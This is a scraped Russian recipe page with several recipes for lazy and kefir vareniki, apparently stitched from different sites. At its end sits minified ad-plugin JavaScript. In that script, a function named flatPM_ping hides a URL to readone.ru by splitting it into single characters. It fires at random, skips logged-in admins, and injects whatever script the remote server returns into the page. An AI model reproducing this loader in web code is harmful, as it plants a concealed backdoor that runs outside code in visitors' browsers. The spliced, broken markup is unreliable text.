Ленивые вареники на кефире

Ленивые вареники на кефире

Очень нежные и вкусные ленивые вареники на кефире. Таких ленивых вареников вы еще не пробовали, этот рецепт порадует вас своей оригинальностью и простотой приготовления.

Ингредиенты

  • 250 мл кефира
  • 220 гр муки
  • 150 гр творога
  • 1 яйцо
  • 2 ст.л. сливочного масла
  • 1,5-2 ст.л. сахара
  • пол-ч.л. соды (погасить ее уксусом)
  • щепотка соли

Рецепт приготовления блюда в домашних условиях

  1. Вбить в миску яйцо, влить кефир, всыпать 1/4 ч.л. соли и взбить. Добавить гашенную соду, просеять муку через сито и тщательно перемешать. Замесить мягкое тесто.
  2. Плоскую поверхность присыпать мукой, из теста сделать несколько жгутов и выложить их на поверхность. Нарезать жгуты небольшими кусочками, сложить их в кипящую подсоленную воду.
  3. Варить ленивые вареники на кефире 5 минут после закипания. Затем переложить их шумовкой на блюдо, добавить протертый через сито творог, сливочное масло и сахар по вкусу. Ленивые вареники на кефире готовы, разложить их по тарелкам и подавать горячими.

Похожие рецепты:

Вареники с картошкой и творогом

Шоколадные вареники с вишней

Соленые вареники с творогом

Шоколадные вареники с творогом

Вареники с замороженной клубникой

Вареники с творогом на кефире

Ваши отзывы и советы

Новое на сайте:

К сезону десертов:

480 мин. / Сложно

480 мин. / Средне

480 мин. / Средне

120 мин. / Сложно

480 мин. / Средне

Мы в соцсетях

FOODideas (идеи для еды) – это сайт, посвящённый искусству приготовления пищи дома, где собраны лучшие рецепты кулинарных блюд с фотографиями и подробными пошаговыми инструкциями, специально, чтобы вы могли приготовить любое, даже самое сложное блюдо в домашних условиях. Так же наши рецепты вы можете читать в нашем Яндекс Дзен канале – Foodideas Zen

Ленивые вареники с творогом на кефире

Ингредиенты

  • 500 г творога;
  • 50 мл кефира;
  • 1 куриное яйцо;
  • 3 ст. ложки сахара; 90 г
  • 200 г (1,5 стакана) муки;
  • 30 г сливочного масла в тесто + 30 г для подливки;
  • соль по вкусу.

Время приготовления – около 40 минут.

Выход – 42 вареника (6 порций).

Калорийность ленивых вареников с творогом: 246 ккал на 100 г

Наверное, сложно найти человека, который не любил бы вареники. Но если у вас нет времени для приготовления традиционных вареников с начинкой, попробуйте сварить так называемые “ленивые” вареники. Чаще всего их делают с творогом. Рецепт ленивых вареников с творогом преполагает те же продукты, что и обычные. Однако творог в данном случае выступает не в роли начинки, а входит в состав теста. В результате процесс изготовления вареников существенно упрощается.

Как приготовить ленивые вареники с творогом – пошаговый рецепт с фото

Подготовьте ингредиенты для ленивых вареников

В творог насыпать сахар, немного соли и хорошенько растереть. Вбить яйцо и добавить кефир (если творог нежирный и жидкий, то кефир можно не добавлять), всё хорошо размешать.

В однородную творожную массу без комочков добавить растопленное сливочное масло и постепенно насыпать муку, которую желательно предварительно просеять. Замешивать тесто сначала с помощью ложки, а потом – руками, делая это на доске или на столе, присыпанном мукой. Тесто не должно слишком прилипать к рукам. В случае необходимости надо ещё подсыпать муку.

Теперь уже можно налить в кастрюлю воды (желательно набирать воды чуть больше половины кастрюли), немного посолить и поставить на огонь.

Пора приступать к изготовлению самих ленивых вареников. Для этого творожное тесто надо разрезать пополам. Из каждой части скатать колбаску диаметром около 2-3 см и нарезать её поперёк на одинаковые по размеру кусочки (примерно по 1 см толщиной). Их можно разложить на тарелке или на доске, посыпанной мукой.

Когда вода закипит, осторожно опустить в неё часть вареников. Сразу много лучше не накладывать, потому что в процессе варки они ещё увеличатся в размерах. Сколько варить ленивые вареники с творогом? Обычно после того, как вареники всплывут, их варят ещё около двух минут. Но всё зависит от размеров заготовок: если вареники у вас получились толстенькие, то и варить их нужно чуть дольше, примерно 3-4 минуты.

Достать вареники из кастрюли шумовкой и полить сливочным маслом.

При подаче к столу вареники можно присыпать сахаром и полить сметаной. Ленивые вареники можно употреблять и в таком виде, но вы можете сделать их намного вкуснее и аппетитнее, если ещё обжарите сваренные вареники в сливочном масле на сковороде. Для этого их нужно выложить на хорошо разогретую сковороду с маслом и обжарить на среднем огне до образования золотистой корочки с каждой стороны. Это займёт примерно по три минуты на каждую сторону. Точно также рекомендуется поступать, если нужно разогреть остывшие вареники.

Вот и готовы ленивые вареники с творогом! Рецепт с фото пошагово, изложенный выше, облегчит процесс их приготовления.

8 классных рецептов ленивых вареников из творога и не только

Простые и вкусные блюда, которые можно приготовить на завтрак, обед или ужин.

1. Классические ленивые вареники

Ингредиенты

  • 400 г творога;
  • 1 яйцо;
  • соль — по вкусу;
  • 3 столовые ложки сахара;
  • 300 г муки.

Приготовление

Разомните творог и смешайте с яйцом, солью и сахаром. Добавьте почти всю муку и замесите тесто. После разделите его на несколько частей, сформируйте колбаски и разрежьте их на небольшие кусочки. Сверху слегка присыпьте мукой.

Вскипятите подсоленную воду и опустите в неё ленивые вареники. Как только они всплывут, доставайте.

Сохраните рецепты 🍎

2. Ленивые вареники с манкой

Ингредиенты

  • 40–50 г сливочного масла;
  • ½–1 столовая ложка сахара;
  • 200 г творога;
  • 5–6 столовых ложек манки;
  • 1 яйцо;
  • 2–4 столовые ложки муки;
  • соль — по вкусу.

Приготовление

Масло размягчите, разотрите с сахаром, а после перемешайте с творогом, манкой и яйцом. Понемногу засыпайте муку и замесите тесто. Оставьте в холодильнике на 25–30 минут. Если тесто недостаточно густое, добавьте ещё пару столовых ложек муки.

Разделите массу на несколько частей, раскатайте в колбаски и нарежьте небольшими кусочками.

Отваривайте ленивые вареники в подсоленной кипящей воде. Практически сразу после всплывания доставайте.

Обязательно приготовьте 🍏

3. Ленивые вареники из творога с овсянкой

Ингредиенты

  • 250 г творога;
  • 6 столовых ложек овсянки быстрого приготовления;
  • 1 яйцо;
  • соль — по вкусу;
  • ½–1 столовая ложка сахара;
  • 50–100 г муки.

Приготовление

Творог разомните и смешайте с измельчённой овсянкой, яйцом, солью и сахаром. Посыпьте доску или стол мукой и раскатайте несколько колбасок из теста, после нарежьте небольшими кусочками.

Варите ленивые вареники в подсоленной кипящей воде примерно 2–3 минуты после всплывания.

Выберите лучший 👌

4. Ленивые вареники из творога с изюмом и манкой

Ингредиенты

  • 1 яйцо;
  • 300 г творога;
  • 2 столовые ложки сахара;
  • 2 столовые ложки манки;
  • 30 г изюма (можно использовать другие сухофрукты или свежие ягоды и фрукты);
  • соль — по вкусу.

Приготовление

Белок отделите от желтка и взбейте миксером. Творог разотрите с желтком и сахаром, перемешайте сначала с манкой, а после — со взбитым белком. Оставьте в холодильнике на 20–30 минут.

Разделите тесто на небольшие кусочки, сделайте из них лепёшки, в середину которых положите изюм. Скатайте творожные шарики, чтобы начинка оказалась внутри.

Варите в подсоленной воде примерно 2 минуты после того, как вареники всплывут.

Сделайте без повода 🍋

5. Ленивые вареники с фруктами

Ингредиенты

  • 100 г любых фруктов;
  • 350 г творога;
  • 1 яйцо;
  • соль — по вкусу;
  • 1 столовая ложка сахара;
  • 2 столовые ложки муки.

Приготовление

Фрукты нарежьте маленькими кусочками. Смешайте их с творогом, яйцом, солью и сахаром. Засыпьте муку и замесите тесто, после раскатайте его в колбаску и порежьте небольшими кусочками.

Варите в подсоленной кипящей воде не больше 10–25 секунд после всплывания.

Порадуйте семью 🍒

6. Ленивые вареники с тыквой

Ингредиенты

  • 130–150 г тыквы;
  • 200 г творога;
  • 1 яйцо;
  • соль — по вкусу;
  • 50 г сахара;
  • 160 г муки.

Приготовление

Кусочки тыквы отварите до готовности примерно за 25 минут. Остудите и смешайте с творогом, яйцом, солью и сахаром. После взбейте блендером, чтобы получилась однородная масса. Всыпьте примерно ⅔ муки и замешивайте тесто, постепенно добавляя ещё понемногу.

Готовое тесто разделите на несколько частей и раскатайте в колбаски, а после порежьте их небольшими кусочками. Варите ленивые вареники в подсоленной воде примерно 3–5 минут.

Удивите гостей 🎃

7. Ленивые вареники со шпинатом

Ингредиенты

  • 200 г шпината;
  • 200 г творога;
  • 1 яйцо;
  • 1 чайная ложка сахара;
  • соль — по вкусу;
  • 150 г муки.

Приготовление

Шпинат обдайте кипятком и нарубите ножом или измельчите блендером. Творог соедините с яйцом, сахаром и солью. После смешайте со шпинатом, добавьте муку и замесите тесто. Разделите его на несколько частей, раскатайте в колбаски и разрежьте на небольшие кусочки.

Варите в подсоленной кипящей воде примерно 2 минуты после того, как ленивые вареники всплывут.

Угостите всех 🥧

8. Ленивые вареники с картошкой

Ингредиенты

  • 4 картофелины;
  • соль — по вкусу;
  • 50–60 г муки;
  • 1 яйцо.

Приготовление

Картошку отварите до готовности. Протрите через сито, остудите, посолите и смешайте с мукой и яйцом. Замесите тесто. После разделите его на несколько частей, раскатайте в колбаски и нарежьте небольшими кусочками.

Варите примерно 2–3 минуты в кипящей подсоленной воде.

Сладкие вареники с творогом на кефире — просто и быстро, из доступных продуктов

Классический рецепт пышных вареников на кефире со сладкой начинкой из творога. Они получаются очень вкусными, мягкими и нежными, с приятным ароматом ванили. Готовятся просто и быстро, из доступных продуктов.

Тесто для вареников замешивается без добавления яиц. Оно мягкое за счет кефира, а пышное получается благодаря соде. Такое тесто превосходно сочетается с творожной начинкой. Вареники очень вкусные, попробуйте!

Ингредиенты:

Для теста:

  • Кефир – 250 мл.
  • Сода – 0,5 ч. л.
  • Пшеничная мука – 350 г + 100 г на подпыл.
  • Соль – 1 щепотка.

Для начинки:

  • Творог – 400 г.
  • Желток – 1 шт.
  • Сахар – 2-3 ст. л.
  • Ванилин – на кончике ножа.

Для подачи:

  • Сливочное масло – 30 г.
  • Сахарная пудра – по вкусу.

Время приготовления: 40 минут. Количество порций: 4.

Приготовление:

1. Творог смешайте с желтком и сахарным песком, добавьте немного ванилина для аромата. Разотрите все до однородности — удобнее всего использовать столовую вилку.

Творог для начинки старайтесь выбирать жирный и не слишком влажный. Если кисломолочный продукт очень сухой, то можно добавить не один желток, а два.

2. Смешайте просеянную муку с содой и солью. Постепенно подливая кефир, замесите тесто. Замешивайте сначала ложкой, а потом и руками. Тесто для вареников должно получиться плотным, но мягким, «не забитым» мукой. В зависимости от густоты кефира может уйти немного больше муки (на 2-3 ложки).

3. Разделите тесто на две примерно разные части и скатайте в виде длинных колбасок. Разрежьте на кусочки-шайбочки.

4. Каждую шайбочку обмакните в муку, скатайте шарик, а затем раскатайте с помощью скалки, чтобы получились небольшие лепешки.

5. По центру выложите творожную начинку и сформируйте вареники — изделия в форме полумесяца.

6. Доведите до кипения воду в кастрюле, слегка подсолите ее и опустите в кипяток вареники — варите небольшими порциями, так они не слипнутся между собой. Во время варки изделия немного вырастут, станут более пышными и мягкими. Время варки — примерно 2 минуты (начинка уже готова, должно приготовиться только тесто, так что не переварите!).

7. Выньте вареники из кастрюли с помощью шумовки и сразу же смажьте сливочным маслом, чтобы они не слиплись между собой и вкусно пахли сливками.

Подавайте творожные вареники в теплом или в холодном виде, посыпав сверху сахарной пудрой. При желании можно дополнить ягодами, сиропом или медом.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};
Оцените рецепт ОценитьПрименить